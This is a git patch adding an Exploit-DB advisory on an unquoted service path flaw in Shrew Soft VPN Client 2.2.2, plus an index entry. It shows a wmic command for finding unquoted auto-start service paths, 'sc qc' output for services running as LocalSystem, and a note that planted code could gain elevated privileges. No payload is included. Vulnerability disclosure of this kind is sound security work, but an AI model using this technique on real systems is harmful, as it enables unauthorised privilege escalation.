From 9ec37edbed6fe1918e61e972d70f465210c29ceb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 16 Nov 2019 05:01:41 +0000 Subject: [PATCH] DB: 2019-11-16 1 changes to exploits/shellcodes Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path --- exploits/windows/local/47660.txt | 51 ++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 52 insertions(+) create mode 100644 exploits/windows/local/47660.txt diff --git a/exploits/windows/local/47660.txt b/exploits/windows/local/47660.txt new file mode 100644 index 000000000..27b775be0 --- /dev/null +++ b/exploits/windows/local/47660.txt @@ -0,0 +1,51 @@ +# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path +# Date: 2019-11-14 +# Exploit Author: D.Goedecke +# Vendor Homepage: www.shrew.net +# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe +# Version: 2.2.2 +# Tested on: Windows 10 64bit + + +C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ +ShrewSoft IKE Daemon iked C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto +ShrewSoft IPSEC Daemon ipsecd C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto + + +C:\Users\user>sc qc iked +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: iked + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ShrewSoft IKE Daemon + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\user>sc qc ipsecd +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ipsecd + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ShrewSoft IPSEC Daemon + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + +#Exploit: +============ +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other +security applications where it could potentially be executed during +application startup or reboot. If successful, the local user's code +would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 52bd7bbcd..43e9df202 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10773,6 +10773,7 @@ id,file,description,date,author,type,platform,port 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows, 47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows, 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows, +47660,exploits/windows/local/47660.txt,"Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path",2019-11-15,D.Goedecke,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139